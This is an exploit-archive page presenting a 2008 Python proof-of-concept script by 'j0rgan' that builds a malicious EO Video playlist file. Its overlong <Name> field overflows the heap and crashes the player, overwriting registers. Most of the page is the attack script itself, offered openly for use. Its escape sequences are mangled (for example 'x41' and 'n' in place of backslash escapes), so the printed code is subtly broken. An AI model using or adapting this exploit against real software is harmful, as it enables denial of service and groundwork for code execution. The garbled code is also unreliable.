EO Video 1.36 Local Heap Overflow DOS / PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : EO Video 1.36 Local Heap Overflow DOS / PoC
# Published : 2008-08-16
# Author : j0rgan
# Previous Title : VLC 0.8.6i tta File Parsing Heap Overflow PoC
# Next Title : Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC

#!/usr/bin/python
# --------------------------------------------------------------
# EO Video v1.36 Heap Overflow local PoC/DoS exploit
# *.eop playlist file in <Name> buffer overflow
# Other versions may be vulnerable too...
# --------------------------------------------------------------
# Vulnerability discovered and coded by Muris Kurgas aka j0rgan
# jorganwd [at] gmail [dot] com
# --------------------------------------------------------------
#
# Who uses this crap of player anyway? :)
# --------------------------------------------------------------
# EAX 42424242
# EDX 42424242
# --------------------------------------------------------------

import os

bafer = 'x41'* 700 + 'x42' * 4

print "Spit me out, all bright and shiny! :)"
fileHandle = open ( 'plejlista.eop', 'w' )
fileHandle.write ('<EOPlaylist>n<Playlist>n<FolderList>n<Folder>n<Name>nesto</Name>n<TrueFrequency>1</TrueFrequency>n ')
fileHandle.write ('</Folder>n<Folder>n<Name>nesto</Name>n<TrueFrequency>1</TrueFrequency>n</Folder>n</FolderList>n<ProjectElement>n ')
fileHandle.write ('<Name>'+bafer+'</Name>')
fileHandle.write ('<StartTime>0</StartTime>n<EndTime>0</EndTime>n<MediaSize>n<Width>-1</Width>n<Height>-1</Height>n</MediaSize>n ')
fileHandle.write ('<State>30216</State>n<FolderPositionIndex>0</FolderPositionIndex>n ')
fileHandle.write ('</ProjectElement>n</Playlist>n</EOPlaylist>n')
fileHandle.close ()

# www.Syue.com [2008-08-16]